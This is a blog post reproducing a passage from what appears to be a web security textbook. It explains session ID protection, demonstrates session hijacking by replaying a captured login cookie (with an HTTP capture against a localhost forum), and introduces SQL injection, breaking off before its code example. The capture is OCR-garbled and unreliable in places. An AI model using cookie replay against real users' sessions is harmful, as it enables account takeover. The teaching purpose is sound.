Session IDs must be protected because they are essentially a form of identification. Just as someone who steals an employee badge could gain unauthorized access to a building, someone who steals a session ID can gain unauthorized access to a system. For this reason, we follow some basic rules on handling session identifiers:
■ They must be uniquely generated so that no two users are ever assigned the same ID.
■ They must be random enough that that nobody can predict a future ID or determine someone else's ID.
■ They must be long enough to prevent the brute-force guessing of an ID in use.
Session IDs are typically transmitted by cookies, though they're also commonly seen in post data (through hidden form fields) and queries. It really doesn't matter how or where they're stored, since they're all equally exposed in the packet. Usually a site will just use the session ID created by the server, but every once in a while developers create their own; these are most subject to
abuse. Several large commercial Web sites have made headlines for failing to create unique and random session IDs. In some extreme cases, they actually just incremented the number up for each user, so that guessing someone else's ID was as simple as adding 1 to your own.
When session IDs aren't protected, they're subject to theft and reuse. Figure B.32 shows the result of logging into a popular free portal application.You can see that the server sets a new cookie reflecting the authenticated state.
Figure B.32 The Cookie Changes to Reflect the Authenticated State
POST /torum/login_user.asp?FID=0 HTTP/1.0 Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 StumbleUpon/1.995 Accept: teKt/KmLapplication/KmLapplication/Khtrnl+KrnLteKt/htrnl;q=0.S.teKt/plain;q=0.8.image/png.VK;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip.deflate Accept-Charset: ISO-8859-1 ,utf-8;q=0.7,";q=0.7 Keep-Alive: 300
R eferer: http://localhost/forum/login_user.asp Content-Type: application/k-www-form-urlencoded Content-Length: 118 Connection: Close
Cookie: S 0 0 P=LTVS T =38304%2E 5169791667; AS PS E S S10 NI DAS D S AAS B =H LKJ PI ICE N B M G FKJ E M LH FN PJ
name=Ann+Nornenus^password=anni1^AutoLogin=true&NS=true&securitvCode=218318&sessionlD=680500324&CFM=&Subrnit=Forum+Login
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 13 Nov 2004 17:24:56 GMT
Server: CoffeeMachine Embeded HTTPd
K-Powered-By: Hobbits
pragma: no-cache
cache-control: private
Location: login_user_test. asp?CFM=
Connection: Keep-Alive
Content-Length: 121
Content-Type: tent/html
Expires: Thu, 11 Nov 2004 17:24:56 GMT
Cache-control: No-Store
S et-Cookie: S 0 0 P=N S =0WJ ID =Ann+N omenus87ZFAAZ5E E <VS T =38304%2E 5169791667; path=/; e*pires=S un, 13-N ov-2005 17:24:56 GMT
If the user then logged off the application, the application would replace the cookie with something that reflected the unauthenticated state. However, many people simply close their browsers without actually logging off the application. This keeps the session open on the server and in the application until it times out.
The browser is closed and cookies are cleared. A new request is made for a restricted page, and as shown in Figure B.33, the server responds accordingly, since there is now nothing identifying the person as a valid user.
Подпись: Figure B.33 Without the Cookie, No Valid Session Exists
However, by simply substituting the cookie that was set by the server during the authenticated state, we now get the authenticated page shown in Figure B.34.The server doesn't really know who is viewing the page; the hacker presented the correct credentials and is allowed through. By adding the session ID to the request, the hacker now has access to everything the legitimate user has access to on this application.
Figure B.34 The Cookie Contains All the Authentication Necessary
Cookies are also excellent sources of other information, and some developers have actually stored the user's ID and password in the cookie in plaintext! Cookies sent to a non-SSL site are easily stolen by sniffing, but even on an SSL site, cookies are easily stolen using a cross-site scripting attack. Session Ids that are predictable do not even require a stolen identifier; with enough analysis, the hacker can simply learn the algorithms used to create the identifiers and create their own identifiers.
Command Execution: SQL Injection
Input validation is a central concept to Web application security. Developers must scrutinize everything sent in the HTTP request to ensure that it is valid, expectable input before using it. Entire papers, projects, and products exist to help with input validation. When developers don't validate the request, their applications can become extremely susceptible to tampering.The cross-site scripting vulnerability we explored earlier relies on an input validation fault: he fact that the JavaScript was accepted by the application in the first place.
There were other factors involved with the XSS attack as well—not only must the application accept the JavaScript, but it must also replay it back properly so that it executes. Finally, there's the social engineering aspect—phishing for the hapless client. Phishing scams are highly visible and have been going on for ages (think 419ers), but SQL injection is even more prevalent, though less publicized.
Command injection refers to being able to inject some sort of code into the Web application that executes. Just as cross-site scripting inserts scripts, a hacker can also try inserting shell commands, Web code, or even full database queries into a Web application.
Of all the possible command injections, the most common one by far is SQL injection. By inserting carefully crafted SQL queries into a vulnerable Web application, a hacker can actually get his or her own commands to run on the database. Some testing is required to find the vulnerable parameter and to determine the exact maneuvering required to get a query into a vulnerable Web application. Once that position is found, however, the hacker can immediately go about enumerating the database and then finally extracting data from it.
SQL injection exploits common methods of performing database queries that concatenate input into a text string. Look at the code snippet in Figure B.35 for selecting patient information based on a supplied search term.
No comments:
Post a Comment